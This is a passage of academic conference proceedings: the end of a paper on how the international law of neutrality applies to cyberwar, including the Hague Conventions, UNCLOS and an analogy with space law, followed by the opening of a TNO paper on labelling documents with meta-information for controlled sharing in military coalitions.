development of conditions under which their neutrality was recognized by the belligerents and other<br />

conditions under which neutrality was lost. This paper addresses modern concepts of neutrality, and<br />

explores the potential for, and perhaps need to, change our concepts of neutrality in the context of<br />

cyberwar as information technologies change warfare as it was previously practiced.<br />

War is “a condition of armed hostility between States,” (Hyde 1945, p. 1686. Cited in Elsea &<br />

Grimmett 2007, p. 23) or “a contention, through the use of armed force, between states, undertaken<br />

for the purpose of overpowering another.” (von Glahn 1992. p. 669. Cited in Elsea & Grimmett 2007,<br />

p. 23) War is “an armed conflict, or a state of belligerence, between two factions, states, nations,<br />

coalitions or combinations thereof. Hostilities between the opponents may be initiated with or without<br />

a formal declaration by any of the parties that a state of war exists.” (Dupuy, p. 261) Marcus Tullius<br />

Cicero (106-43 BCE) famously said in an oration, Pro Tito Annio Milone ad iudicem oratio (Pro<br />

Milone), in defense of Titus Annius Milo, who had been accused of murdering Publius Clodius<br />

Pulcher, a political enemy, “Silent enim leges inter arma” (the law is silent in times of war), (Clark<br />

1907) but his assertion wasn’t true in antiquity, and isn’t true today.<br />

Except in limited conditions, war was made illegal by the Charter of the United Nations, which is a<br />

treaty among the world’s nations signed in the aftermath of World War II, a terrible conflict in which<br />

some fifty million (perhaps as many as eighty million) died worldwide. (White 2005) Article 2(4) of the<br />

Charter provides that, “All Members shall refrain in their international relations from the threat or use<br />

of force against the territorial integrity or political independence of any state, or in any other manner<br />

inconsistent with the Purposes of the United Nations.” However, Article 51 makes use of military force<br />

is permissible in self-defense, and Article 42 makes military force permissible if authorized by the<br />

Security Council.<br />

When military force is used, its use is subject to other treaties that limit the nature and extent of force<br />

that may be employed in achieving military objectives. Philosophers, statesmen and military<br />

221


Julie Ryan and Daniel Ryan<br />

commanders have struggled to balance the destructive forces of armed combat with national and<br />

international humanitarian concerns, (Kolb 1997, n. 3) leading to the twin concepts of jus ad bellum —<br />

“the conditions under which belligerents might justly resort to the use of armed force as a means of<br />

conflict resolution” (Hensel 2008, p. 5) — and jus in bello —“the conditions for the just employment of<br />

armed force at the strategic, operational and tactical levels during periods of armed hostilities” (Hensel<br />

2008, p. 5) — that together comprise the notions of just war. The notion of jus in bello (“justice in war”)<br />

was known to Sun Tzu in 4 th century BCE China. (Giles) Even, so, the concept of jus in bello was<br />

more slow to develop than jus ad bellum. In addition to the United Nations Charter, limitations on the<br />

use of military force include inter alia the Geneva Conventions and Protocols, and the Hague<br />

Conventions.<br />

2. Cyberwar<br />

As human beings have moved into cyberspace, they have begun to engage in all the usual types of<br />

human behavior, good and bad, allowed by the technology: communicating, working, contracting,<br />

playing, and socializing, as well as stealing, breaching contracts, engaging in tortious behavior, and<br />

invading other users’ privacy. Now, nation-states are looking at cyberspace as place to conduct<br />

warfare operations, and terrorists are examining the possibilities inherent in asymmetric attacks<br />

through cyberspace on critical infrastructures.<br />

The “nature” of cyberspace, however, differs in significant ways from the physical, electrical, chemical,<br />

and photonic properties of “real” space. Communications across the Internet take the form of packets<br />

containing addressing and administrative data as well as the intended bits being exchanged. ("What is<br />

a packet?") The paths taken by packets exchanged across the Internet are under the control of<br />

algorithms within the switches that relay the packets. (Tyson 2001) The paths are neither known to<br />

nor controllable by the users of the network.<br />

Traditional approaches developed in real space for responding to misbehavior are hampered in<br />

cyberspace by difficulties in attribution, and only a loose correlation exists between “location” in<br />

cyberspace and location of users and cyber equipment within traditional legal jurisdictions. These<br />

realities will certainly impact the development of weapons, strategies, doctrines and tactics for use in<br />

cyberwar and countering cyberterrorism. Nevertheless, nations will undoubtedly seek to exercise and<br />

enhance national power by means of information operations in cyberspace, and the laws of armed<br />

conflict that have served civilized nations well in real space must be examined to determine how they<br />

can be used, and if they must be changed, to meet the realities of cyberwar and cyberterrorism. This<br />

paper will specifically address the legal issues associated with nation-state neutrality as applicable to<br />

these new realities.<br />

3. Neutrality during periods of belligerency<br />

“Neutrality” refers to concepts in customary international law and treaty law concerning the nonparticipation<br />

of some nations in warfare when a state of belligerency exists among other nations. The<br />

laws of neutrality presuppose the coexistence of war and peace – belligerents and their allies at war<br />

with other belligerents and their allies, while diplomacy, commerce, communications and so forth<br />

continue with and among nations not involved in the belligerencies, both neutral states with other<br />

neutral nations and neutral states with the belligerents. (Neff 2000, p. 1. Cited by Kelsey 2008, p.<br />

1442) Neutrality is a “legal, temporary situation of one state in relation to a conflict between two or<br />

more states. Neutrality consists in not participating directly in the war, through not rendering<br />

assistance to any belligerent party.” (Osmanczyk & Mango 2004, A-F, p. 1547) It may be manifested<br />

by unilateral declaration or by entry into bilateral or multilateral treaties. Grotius identified two rules for<br />

neutrals: (1) neutrals should neither strengthen the position of a belligerent power with an unjust<br />

cause, nor hinder the position of a belligerent with a just cause, (Book III, Chapter XVII (III)(1))and (2)<br />

warring parties should be treated alike when the cause of the war is in doubt. (Book III, Chapter XVII<br />

(III)(1))<br />

Even before the second half of the 19th century when the laws of war began to be<br />

codified in multilateral treaties, some principles relating to the conduct of armed hostilities<br />

had been included in bilateral treaties.... The rights and duties of neutrality in war,<br />

especially at sea, have been addressed in a large number of bilateral treaties between<br />

states from at least the early 17th century. [Footnote 12: W. E. Hall, The Rights and<br />

Duties of Neutrals, Longman's Green, London, 1874, pages 27-46, in a chapter<br />

surveying the growth of the law affecting belligerent and neutral states to the end of the<br />

222


Julie Ryan and Daniel Ryan<br />

18th century, refers to "innumerable treaties" relating to neutrality that were concluded<br />

over several centuries (page 28).] Sometimes, following the conclusion of a bilateral<br />

treaty on neutrality, additional states proceeded [sic] to it. [Footnote 13: For example, on<br />

February 27, 1801 Denmark ceded to the convention between Russia and Sweden for<br />

the Reestablishment of an Armed Neutrality, which had been signed on 16 December<br />

1800. 55 CTS (1799-1801) 411-24.] (Roberts & Guelff 1982, p. 4)<br />

The law of neutrality was eventually codified in the Hague Conventions of 1907, including No. 3,<br />

Convention Relative to the Opening of Hostilities (requiring notice to neutrals of a state of war); No.<br />

11, Convention Relative to Certain Restrictions with Regard to the Exercise of the Right of Capture in<br />

Naval War; and especially No. 5, Convention Respecting Rights and Duties of Neutral Powers and<br />

Persons in Case of War on Land. (The Avalon Project)<br />

Having assumed a position of neutrality, a nation must not allow transit of military forces or equipment<br />

by belligerents across its land territory or the airspace above its land territory. The rules with respect<br />

to belligerent naval vessels, and aircraft flying over a neutral’s territorial waters and exclusive<br />

economic zones, are more complicated. The notion of transit passage applies to “straits which are<br />

used for international navigation between one part of the high seas or an exclusive economic zone<br />

and another part of the high seas or an exclusive economic zone.” (UNCLOS 1982, Art. 37) Ships and<br />

aircraft operated by belligerent nations may transit the territorial waters of a neutral state “solely for<br />

the purpose of continuous and expeditious transit of the strait . . . .” (UNCLOS 1982, Art. 38) During<br />

transit passage, ships and aircraft must: “proceed without delay . . ., refrain from any threat or use of<br />

force against the sovereignty, territorial integrity or political independence of States bordering the<br />

strait . . ., and refrain from any activities other than those incident to their normal modes of continuous<br />

and expeditious transit unless rendered necessary by force majeure or by distress.” (UNCLOS 1982,<br />

Art. 39)<br />

The notion of innocent passage applies to passage through the territorial waters of a neutral state and<br />

is permitted “so long as it is not prejudicial to the peace, good order or security of the coastal State.”<br />

(UNCLOS 1982, Art. 19) Passage is not innocent if it involves “any threat or use of force against the<br />

sovereignty, territorial integrity or political independence of the coastal State . . ., any exercise or<br />

practice with weapons of any kind, . . . any act of propaganda aimed at affecting the defence or<br />

security of the coastal State, . . . the launching, landing or taking on board of any aircraft [or] military<br />

device, [or] any act aimed at interfering with any systems of communication or any other facilities or<br />

installations of the coastal State.”(UNCLOS 1982, Art. 19)<br />

Once a state decides on a position of neutrality, it must take steps to prevent its territory<br />

from becoming a base for military operations of a belligerent. It must prevent the<br />

recruiting of military personnel, the organizing of military expeditions, and the<br />

constructing, outfitting, commissioning, and arming of warships for belligerent use. A<br />

neutral state is under no obligation to prevent private persons or companies from<br />

advancing credits or selling commodities to belligerents. Such sales are not illegal under<br />

the international law of neutrality. A neutral state may, if it chooses, go beyond the<br />

requirements of international law by placing an embargo upon some or all sales or<br />

credits to belligerents by its nationals. If it does so, it has the obligation to see that<br />

legislation, commonly referred to as neutrality laws, is applied impartially to all<br />

belligerents. Once enacted, neutrality laws are not to be modified in ways that would<br />

advantage one party in the war. (Neutrality 2008)<br />

There is a limited communications exception in the law of neutrality for communications by<br />

belligerents and their allies across the land territory of neutral states. Hague Convention V, Article 8,<br />

provides, “A neutral Power is not called upon to forbid or restrict the use on behalf of the belligerents<br />

of telegraph or telephone cables or of wireless telegraphy apparatus belonging to it or to companies<br />

or private individuals.” The Internet did not exist when the Hague Conventions were written, of course,<br />

but arguably this exception applies to Internet communications as well as telegraph and telephone<br />

communications. The nature and scope of this exemption is a key issue for neutrality in the context of<br />

cyberspace.<br />

4. Neutrality in the context of cyberwar<br />

When Hague V(8) was written, communications across the territory of a neutral nation via telegraph or<br />

telephone cables, or by wireless telegraphy, might have involved passing a variety of types of<br />

information. Command and control information might have been passed, for example, or intelligence<br />

223


Julie Ryan and Daniel Ryan<br />

or targeting information. Assuming that military units knew their own locations (not, necessarily, a<br />

reasonable assumption in those days), unit locations may have been reported. In short, information<br />

useful in prosecuting the belligerency, if it could be reduced to textual or numeric form suitable for<br />

transmission across the communications systems in use at that time, could be transmitted without<br />

imposing a burden on the neutral state to recognize or interdict the transmission. Some information<br />

may have been encoded or enciphered, and transmission would have necessarily been slow by<br />

today’s standards, but fast relative to other media and transmission capabilities available at the time<br />

(foot, horseback, railroad, ship). (Lail 2002, p. 4)<br />

Fast forward to the twenty-first century, and the ability to pass useful information across the Internet is<br />

much enhanced. Now not just text and numbers may be communicated, but sound to at least the<br />

level of voice recognition, imagery including high-quality color pictures, and measurement and<br />

telemetry data, such as GPS data, can be communicated quickly and easily across the Internet.<br />

Perhaps more importantly, tools and even weapons themselves, perhaps in the form of malware, can<br />

be moved across the territory of neutrals and belligerents alike using the Internet. Those engaged in<br />

such Internet communications do not and, for the most part cannot, know the path the packets<br />

comprising their communications will take, much less can they control the path. In fact, some of the<br />

packets may take different paths from other packets that are part of the same transmission, all<br />

transparent to and beyond the control of those engaged in the communication.<br />

Historically, warfare has involved the use of kinetic weapons (e.g. projectiles) to kill and destroy.<br />

Modern warfare continues to use kinetic weapons, but may also use energy weapons – lasers, for<br />

example; but note that Protocol IV of the 1980 Convention on Certain Conventional Weapons<br />

specifically outlaws the use of blinding lasers – or may use logic weapons to attack and defend cyberdependent<br />

infrastructures. In a modern warfare, information operations may be used in connection<br />

with kinetic operations (as in the confrontation between Russia and Georgia in 2008), (Tikk 2010, p.<br />

66ff) or can be used without ancillary kinetic operations (as in the confrontation between Russia and<br />

Estonia in 2007). (Tikk 2010, p. 14ff) It is highly probable that we will never again see kinetic<br />

operations of any great extent without a cyber component. Whether information operations among<br />

nation-states without “armed conflict” will be deemed to be warfare probably depends upon the level<br />

of destruction realized. (Article 51 of the United Nations Charter uses the expression “armed attack” to<br />

justify war in self-defense by nation-states. However, the expression is not defined. It is not clear that<br />

it is proper, or desirable, to view a purely cyber incident as an armed attack. See Wingfield 2006, p.<br />

12. See also Sullivan 2010) Information operations among, between or with non-nation-states cannot,<br />

by definition, be war, regardless of the level of destruction attained or the used of uniformed military<br />

personnel by one side or another and despite the common misuse of the term in referring to conflicts<br />

that are not between or among nation-states, as in “the global war on terror” (Rumsfeld Memo 16<br />

October 2003) or the “war on drugs.” (Testimony of OMB Director Nussle)<br />

While belligerents’ use of networks that cross a neutral’s territory can take place without violating the<br />

neutrality status of the nations through whose territory the communications pass, Hague V(8) arguably<br />

did not foresee that that use might include weapons. The rules concerning neutrality require that<br />

passage of weapons or other military materials and equipment across the territory of a neutral must<br />

be interdicted by the neutral state, and if it fails to do so, or is unable to do so, the belligerents against<br />

whom the weapons or materials are to be used have a legal right to attack the transfer. (Brown 2006,<br />

p. 210) Hague V(1) forbids land transfers and Hague V(2) forbids use of the atmosphere. Some<br />

analysts have, therefore, concluded that cyberwar is not permitted under current neutrality law without<br />

a likely violation of the claimed neutrality. (Kelsey2008, pp. 1441-6) They recommend changes to<br />

bring the law into conformance with the reality of Internet transfers. (Kelsey 2008, pp. 1448-9) One<br />

recommendation would focus on intent: the rules of neutrality would not be violated unless the<br />

belligerent intended to use the information infrastructure of the neutral to deliver the weapons. The<br />

neutral would not have to interdict an unintentional passage, and would not be subject to attack by the<br />

other side based on an unintentional crossing of its territory by the cyber weapons. (Kelsey 2008, pp.<br />

1448-9) This approach seems hopeless to us. The neutral probably has no knowledge that weapons<br />

are passing across its territory, could realistically do nothing if it did know, and has even less access<br />

to knowledge of the belligerent’s intent with respect to the crossing.<br />

However, there is an alternative approach to framing the problem and it’s solution. Extra-atmospheric<br />

movements of weapons (other than nuclear weapons) and military materials above the territory of<br />

neutrals is permitted without imposing a duty on the neutral to interdict. The United Nations adopted a<br />

224


Julie Ryan and Daniel Ryan<br />

“Declaration of Legal Principles Governing the Activities of States in the Exploration and Use of Outer<br />

Space” in 1963 (Wolter 2003, p. 4) The Declaration has since been supplemented by three<br />

resolutions laying down the legal principles applicable to the exploration and exploitation of outer<br />

space, a “Declaration on International Cooperation in the Exploration and Use of Outer Space for the<br />

Benefit and in the Interest of All States, Taking into Particular Account the Needs of Developing<br />

Countries,” and five treaties and agreements governing the use of space and space-related activities.<br />

(United Nations Treaties and Principles on Space Law ) These treaties, agreements and principles<br />

are collectively known as the “United Nations Treaties and Principles in Outer Space.” Nuclear<br />

weapons are forbidden, but other weapons (kinetic weapons, lasers) are permitted. (Although nuclear<br />

weapons are banned, it is recognized that some uses of nuclear power are needed in space, the<br />

Treaties and Principles provide for safety in its use, mitigation of risks, and liability for states that fail to<br />

control the nuclear power or its sources.)<br />

The very nature of outer space is such that spacecraft do not have the same ability to control their<br />

flight paths that aircraft operating within the atmosphere have, (Braeunig 1997-2008) and the cost of a<br />

space program that could interdict is large, (Fox 2007) so a rule requiring interdiction of belligerents’<br />

weapons in space by the neutral does not make sense. Spacecraft and satellites in orbit pass above<br />

both belligerents and neutrals and cannot avoid doing so, being subject to the laws of celestial<br />

mechanics. Accordingly, the notions of territorial control that apply in the laws of the sea and the<br />

regulation of aircraft, cannot apply in outer space. If neutrals were required to exercise control over<br />

the use of outer space in the same way they exercise control over air traffic in the skies above their<br />

territories, it would be practically impossible to maintain neutrality at all.<br />

Similarly, recognizing the impossibility of neutrals interdicting belligerent Internet use of the neutral’s<br />

information infrastructure without prohibitive costs or unacceptable consequences for the neutral’s licit<br />

use of its own infrastructure: "a state may not be able to prevent [cyber] attacks from leaving its<br />

jurisdiction unless it severs all connections with computer systems in other states." (Brown 2006, p.<br />

210) This indicates that the appropriate rule for Internet use is more like the rule for space than the<br />

rule for air or land traffic, even when the use involves cyber weapons or information useful to the<br />

belligerent for military purposes (telemetry, GPS, weather data, etc.). Such acceptable use would, of<br />

course, apply to all belligerents, because the rules of neutrality prohibit the neutral state favoring one<br />

side in any way over the other side. (Brown 2006, p. 211)<br />

5. Conclusion<br />

Phillip Jessup, in 1936, concluded, "There is nothing new about revising neutrality; it has undergone<br />

an almost constant process of revision in detail." (Jessup 1935-6, p. 156. Cited in Walker 2000, p.<br />

109) With the advent of cyberwar, rules governing neutrality during periods of belligerency need to be<br />

reconsidered and revised yet again. The realities of the Internet age mean that weapons as well as<br />

information can move across communications networks in ways that were not possible or foreseeable<br />

during the earlier evolution of the laws of war and neutrality. Yet the paths that those weapons will<br />

take as they traverse the Internet on the way to their intended targets are beyond the knowledge or<br />

control of the belligerents that launch them. Detection, identification and interdiction by neutrals<br />

across whose territories the weapons may pass are impractical without sacrificing the utility of the<br />

networks for licit use by the neutrals and others, hence impossible.<br />

However, it is the only the details of the rules of neutrality that must change. Neutrals will not be<br />

required to do what they cannot do, and will not be subject to attack when they do not detect, identify<br />

and interdict the flow of weapons through their information infrastructures. The key principle of<br />

neutrality requiring that neutrals do not knowingly and willingly participate in the belligerency, or favor<br />

one side over the other, can and must be retained.<br />

Disclaimer: Opinions expressed in this paper are those of the authors and do not represent positions<br />

of George Washington University, or of the Information Resources Management College, the National<br />

Defense University, the Department of Defense, or the United States Government.<br />

References<br />

The Avalon Project: Documents in Law, History and Diplomacy. Yale Law School, Lillian Goldman Law Library.<br />

http://avalon.law.yale.edu/default.asp.<br />

Boot, Max (2006) War Made New: Technology, Warfare, and the Course of History, 1500 to Today. New York:<br />

Gotham Books.<br />

225


Julie Ryan and Daniel Ryan<br />

Braeunig, Robert A. (1997-2008) Orbital Mechanics. http://www.braeunig.us/space/orbmech.htm.<br />

Brown, Davis, A Proposal for an International Convention To Regulate the Use of Information Systems in Armed<br />

Conflict, 47 Harv. Int'l L.J. 179 (2006).<br />

Clark, A. C. (1907) Q. Asconii Pediani Orationum Ciceronis Quinque Enarratio.<br />

http://www.attalus.org/latin/asconius2.html#Milo.<br />

Dupuy, Trevor N. et al. eds. (2003) Dictionary of Military Terms, 2 nd Ed. New York: H.W. Wilson.<br />

Elsea, Jennifer K. & Grimmett, Richard F. (2007) Declarations of War and Authorizations for the Use of Military<br />

Force: Historical Background and Legal Implications. Washington, DC: Congretional Research Service<br />

RL31133. http://www.fas.org/sgp/crs/natsec/RL31133.pdf.<br />

Fox, Bernard et al. (2007) Guidelines and Metrics for Assessing Space System Cost Estimates. Santa Monica,<br />

CA: Rand Corporation. http://www.rand.org/pubs/technical_reports/2008/RAND_TR418.pdf.<br />

The Gale Group, Inc. (2008) West's Encyclopedia of American Law, Edition 2. Farmington Hills, MI: Thomson<br />

Gale. http://legal-dictionary.thefreedictionary.com/neutrality.<br />

Gat, Azar (2006) War in Human Civilization. Oxford: Oxford University Press.<br />

Giles, Lionel (1910) Sun Tzu on the Art of War. http://www.chinapage.com/sunzi-e.html.<br />

Grotius, Hugo (1925) Du Jure Belli ac Pacis [Of the Law of War and Peace]<br />

Libri Tres. Oxford: Clarendon Press. [Reproduced as a Special Edition (1984) Birmiingham, AL: Legal Classics<br />

Library.] In particular, see Chapter XVII: On Those Who Are of Neither Side in War.<br />

Hall, W. E. (1874) The Rights and Duties of Neutrals, Longman's Green, London.<br />

Hague Convention (V) respecting the Rights and Duties of Neutral Powers and Persons in Case of War on Land.<br />

The Hague, 18 October 1907. http://www.icrc.org/ihl.nsf/FULL/200?OpenDocument.<br />

Hensel, Howard M. (2008) Legitimate Use of Military Force. Surrey, UK:Ashgate Publishing Group.<br />

Hyde, Charles C. (1945) International Law Chiefly as Interpreted and Applied by the<br />

United States, Vol. 3. New York: Hachette Book Group USA (Little Brown & Co.).<br />

International Humanitarian Law - Treaties & Documents by Date. International Committee of the Red Cross.<br />

http://www.icrc.org/ihl.nsf/INTRO?OpenView.<br />

Jessup, Phillip and Deák, Francis (1935-6) Neutrality, Its History, Economics and Law: Vol. IV Today and<br />

Tomorrow. New York: Columbia University Press.<br />

Johnson, Phillip A., et al. (May, 1999) An Assessment of International Legal Issues in Information Operations.<br />

Washington, DC: Department of Defense Office of General Counsel.<br />

Kastenberg, Jushua E. (2009) “Non-Intervention and Neutrality in Cyberspace: An Emerging Principle in the<br />

National Practice of International Law.” 64 A.F. L. Rev. 43.<br />

Keegan, John (1993) A History of Warfare. New York: Alfred A. Knopf.<br />

Kelsey, Jeffrey T. G. (2008) “Hacking into International Humanitarian Law: The Principles of Distinction and<br />

Neutrality in the Age of Cyber Warfare.” 106 Mich. L. Rev. 1427.<br />

Lauterpacht, Hersch, Oppenheim's International Law (7th Ed., 1948) London: Longmans, Green & Co.<br />

Kolb, Robert (1997) “Origin of the twin terms jus ad bellum/jus in bello,” International Review of the Red<br />

Cross, No. 320, p.553-562. Online at<br />

http://www.icrc.org/web/eng/siteeng0.nsf/iwplist163/d9dad4ee8533daefc1256b66005affef.<br />

Lail, Benjamin (2002) Broadband Network and Device Security. Sydney: McGraw-Hill. http://books.mcgrawhill.com/downloads/products/0072194243/0072194243_ch01.pdf.<br />

Neff, Stephen C. (2000) The Rights and Duties of Neutrals. Manchester, UK: Manchester University Press.<br />

Neutrality. (2008) West's Encyclopedia of American Law, Edition 2. http://legaldictionary.thefreedictionary.com/neutrality.<br />

Osmanczyk, Edmund Jan & Mango, Anthony (2004) Encyclopedia of the United Nations and International<br />

Agreements. Florence, Kentucky: Routledge.<br />

Roberts, Adam and Guelff, Richard (1982) Documents on the Laws of War, 3d Ed. Oxford: Oxford University<br />

press.<br />

“Rumsfeld Memo 16 October 2003” (2008) SourceWarch.<br />

http://www.sourcewatch.org/index.php?title=Rumsfeld_Memo_16_October_2003<br />

Sullivan, Bob (2010) “Could Cyber Skirmish Lead U. S. to War?” http://redtape.msnbc.com/2010/06/imagine-thisscenario-estonia-a-nato-member-is-cut-off-from-the-internet-by-cyber-attackers-who-besiege-the-countrysbandw.html<br />

“Testimony of OMB Director Nussle” (2008) The White House.<br />

http://www.whitehouse.gov/omb/legislative_testimony_director_nussle_021308<br />

Tikk, Eneken et al. (2010) International Cyber Incidents: Legal Considerations. Tallinn: Cooperative Cyber<br />

defence Center of Excellence.<br />

Tyson, Jeff. (April 3, 2001) "How Internet Infrastructure Works" HowStuffWorks.com.<br />

http://computer.howstuffworks.com/internet/basics/internet-infrastructure.htm<br />

United Nations Convention on the Law of the Sea (UNCLOS), (1982)<br />

http://www.un.org/Depts/los/convention_agreements/convention_overview_convention.htm.<br />

United Nations Convention on Prohibitions or Restrictions on the Use of Certain Conventional Weapons Which<br />

May Be Deemed to Be Excessively Injurious or to Have Indiscriminate Effects, Protocol IV (1980).<br />

http://www.un.org/millennium/law/xxvi-18-19.htm.<br />

United Nations Treaties and Principles on Space Law (2010)<br />

http://www.unoosa.org/oosa/en/SpaceLaw/treaties.html<br />

226


Julie Ryan and Daniel Ryan<br />

von Glahn, Gerhard (1992) Law Among Nations: An Introduction to Public International Law (<strong>6th</strong> ed.) New York:<br />

Macmillan.<br />

Walker, George K. (November, 2000) “Information Warfare and Neutrality.” 33 Vand. J. Transnat'l L. 1079.<br />

"What is a packet?" (December 1, 2000) HowStuffWorks.com.<br />

http://computer.howstuffworks.com/question525.htm<br />

White, Matthew (2005) Source List and Detailed Death Tolls for the Twentieth Century Hemoclysm.<br />

http://users.erols.com/mwhite28/warstat1.htm.<br />

Wingfield, Thomas C. (2006) “When is a Cyberattack an ‘Armed Attack?’ Legal Thresholds for Distinguishing<br />

Military Activities in Cyberspace.” Cyber Conflict Studies Association.<br />

http://www.docstoc.com/docs/445063/when-is-a-cyberconflict-an-armed-conflict<br />

Wolter, Detlev (2003) Common Security in Outer Space and International Law: A <strong>European</strong> Perspective.<br />

(Geneva: United Nations, UNIDIR/2005/29, 2006)<br />

227


Labelling: Security in Information Management and<br />

Sharing<br />

Harm Schotanus, Tim Hartog, Hiddo Hut and Daniel Boonstra<br />

TNO Information and Communication Technology, Delft, The Netherlands<br />

Harm.schotanus@tno.nl<br />

Tim.hartog@tno.nl<br />

Hiddo.hut@tno.nl<br />

Daniel.boonstra@tno.nl<br />

Abstract: Military communication infrastructures are often deployed as stand-alone information systems<br />

operating at the System High mode. Network-Enabled Capabilities (NEC) and combined military operations lead<br />

to new requirements for information management and sharing which current communication architectures cannot<br />

deliver. This paper informs information architects and security specialists about an incremental approach<br />

introducing labelling of documents by users to facilitate information management and sharing in security related<br />

military scenarios.<br />

Keywords: labelling, meta-information, information security, cross-domain solutions, information sharing, needto-protect,<br />

duty-to-share<br />

1. Introduction<br />

This paper presents an overview of the steps to develop a meta-information capability. First, it<br />

presents a broad overview on what meta-information and labelling is and how it can be applied. Then<br />

it focuses on one specific security application of labelling which is secure information exchange, i.e.<br />

selective and regulated information sharing, based on meta-information. We also present a possible<br />

roadmap for implementing a secure information sharing capability based on meta-information. The<br />

purpose of this roadmap is to analyse what ‘ingredients’ are required for implementing such a<br />

capability, i.e. the problems we have identified and the technology that is necessary to solve these<br />

problems.<br />

The importance of sharing information in networked military operations, especially coalition networks,<br />

is commonly recognised. An important driver for future communication architectures is (NATO)<br />

Network-Enabled Capabilities (NNEC)(Buckman 2005). The integrated and coordinated deployment<br />

of all capabilities within a coalition is the central goal relying heavily upon regulated information<br />

sharing (Schotanus 2009)(Martis 2006). Better integrated communication architecture contributes to<br />

sharing of relevant military information by making it easier and quicker. But how does confidentiality fit<br />

into this picture? What if a coalition partner does not want to share specific information because<br />

sharing poses a bigger risk for them or for the mission than not sharing or vice versa? Which methods<br />

are available to differentiate between information to-be-shared and information not-to-be-shared? The<br />

primary objective is that the owner of the information remains in control of that information.<br />

Relevant information produced during military coalition operations usually does not originate from a<br />

single partner but is the result of multiple partners working together using some form of online or<br />

offline shared information mechanism like documents distributed via e-mail or digital photos shared<br />

via situational awareness applications. Information is nowadays typically divided amongst the coalition<br />

partners, each creating a separate information domain in which the information is stored and<br />

processed. Such an information domain is usually a standalone network. Transferring information<br />

from one domain is handled often by out-of-band means That may cause more problems than it<br />

solves as there is little control over the information exchange. Connecting these different domains is a<br />

step that is currently taken, but also leads to many problems. Not in the least because of different<br />

responsibilities for each of these domains. Information sharing without compromising the<br />

confidentiality is a problem that has to be solved by choosing an information management strategy<br />

that is based on the ability to regulate the sharing of information and that cannot be addressed by<br />

infrastructural solutions. In essence, this is caused by the inability of the infrastructure to determine<br />

the value of the information and hence it cannot enforce decisions about whether information can or<br />

cannot be shared with the intended partner.<br />

228


Harm Schotanus et al.<br />

In the remainder of this paper we will often use the term information domain. This is defined as a<br />

collection of information under one responsibility (e.g. a nation, or organisation) that operates for a<br />

single purpose (e.g. a mission) and has a single security policy.<br />

2. Meta-information and labelling<br />

A new information management strategy could be based on mechanisms that make decisions based<br />

on meta-information instead of on the information itself. By adding relevant meta-information, the user<br />

can effectively control on what conditions information can be released.<br />

Meta-data or meta-information is information about information. For example, a military security<br />

marking (such as NATO SECRET) on the top and bottom of each page of a document is a form of<br />

meta-information because it conveys the classification of the document, in other words it is (security<br />

specific) meta-information about other information. To enable regulated sharing of information<br />

between different information domains or with partners in a coalition, meta-information can be used to<br />

describe certain properties of information objects. These properties can be used to enforce decisions<br />

in a release mechanism whether information should or should not be shared. The meta-information is<br />

often called a label, and the process of creating a label is called labelling. This reflects two important<br />

concepts:<br />

Sharing information between coalition partners presumes a way of deciding whether a specific<br />

information object may or may not be shared.<br />

For each information object a set of properties can be determined that can form a basis decision<br />

process for sharing information.<br />

The crucial concept in our labelling approach is that we separate the logic to enforce decisions from<br />

the intelligence to determine the properties of the information. This means we can reduce the<br />

complexity of the decision making process.<br />

2.1 Examples of meta-information<br />

The use of properties of the information in addition to the original information, creates new<br />

possibilities. If information objects such as files carry meta-information, for example the type-of-file<br />

(presentation, document or image), file extension (ppt, doc, pdf, jpg), author, security marking, timeof-creation,<br />

then these meta-information properties can be used for making decisions in several<br />

scenarios [see Figure 1].<br />

Figure 1: Examples of information with their meta-information<br />

Because our aim is to both facilitate regulated sharing mechanisms and to present the power and<br />

flexibility of meta-information, we categorised these new possibilities in two categories: use cases<br />

within a single information domain and use cases in federated information domains.<br />

Many software applications already store meta-information within information objects. Image files for<br />

example carry resolution information while photos carry the camera manufacturer and model that was<br />

used to take the photo. One problem with proprietary file formats and closed-source applications (e.g.<br />

Microsoft Word) is that the meta-information cannot be easily accessed outside the native software<br />

application because the file is a black box. A second problem is that each file format will have its own<br />

approach to storing meta-information. That implies that a labelling solution has to be adjusted for<br />

every format. A solution for this problem is an application-independent approach where information is<br />

stored in a separate object. Storing meta-information separately from information objects in a<br />

standardised format also improves the flexibility to work with meta-information without having to<br />

depend on the knowledge of the file format or implementation in software.<br />

In certain use-case scenarios where third parties need to process another one’s meta-data, a<br />

standardized specification for conveying the meta-data is needed. NATO has proposed a standard<br />

based on XML labelling (Eggen 2010)(Oudkerk 2010). On september 1 st 2009 POWDER (Protocol for<br />

Web Description Resources) became a W3C recommendation (POWDER 2009). The POWDER suite<br />

229


Harm Schotanus et al.<br />

facilitates the publication of descriptions of (multiple) resources. The goal of the POWDER working<br />

group has been to develop a mechanism that allows not only the provision of descriptions but also a<br />

way to apply them to groups of (online) resources and for the authentication of those descriptions in<br />

relation to establishing a trust level of those descriptions.<br />

2.2 Possibilities of meta-information within a single network<br />

2.2.1 Information Lifecycle Management<br />

Information Lifecycle Management is about the different lifecycle phases that information can go<br />

through, from the creation of information, via different manipulations or updates to the deletion of<br />

information or at least archiving the information for future reference. Easy accessible meta-information<br />

can facilitate Information Lifecycle Management and create new possibilities. For example, with more<br />

meta-information available, information objects could also be archived for different reasons. For<br />

example archive every file that was created by ‘Danielle Zeeg’ because she no longer works at the<br />

company or archive every information object that has been tagged as ‘SFOR’ because that mission<br />

has ended.<br />

Similar to the archiving scenario aiding users or administrators in searching for information can also<br />

benefit from having more meta-information available. For instance search all information objects that<br />

carry file extension ‘pdf’ and are created in 2010 and have been authored by ‘Kees de Witte’ and have<br />

been tagged with ‘SFOR’.<br />

2.2.2 Integrity protection<br />

It is also possible to embed integrity protection capabilities in meta-information. For example by<br />

creating a digital signature of the information, the signature can later be used to verify information has<br />

been changed or validate who created it. This kind of meta-information helps to protect information as<br />

any modifications to the information can be detected. If meta-information were to include integrity<br />

protection then users or administrators could for example find all data objects that were modified after<br />

the meta-information was generated. Another possibility would be to establish the trustworthiness of<br />

information by distinguishing between data objects that do or do not have integrity protection<br />

embedded in their meta-information.<br />

Meta-information can also be used for identification purposes. For example meta-information<br />

containing the type, manufacturer, location or capability of a specific hardware sensor deployed in the<br />

field can be used to select certain sensor feeds, i.e. select feeds of all sensors of type audio-sensor,<br />

or select feeds of all sensors that are located within a one-kilometre radius of GPS coordinate with<br />

latitude 50.84064 and longitude 4.35498.<br />

2.3 Possibilities of meta-information in a federated domain<br />

The different types of meta-information discussed in the previous paragraph may also be used in<br />

federated context. Not only to regulate information flows between different domains, but as we shall<br />

see, may have other possibilities too.<br />

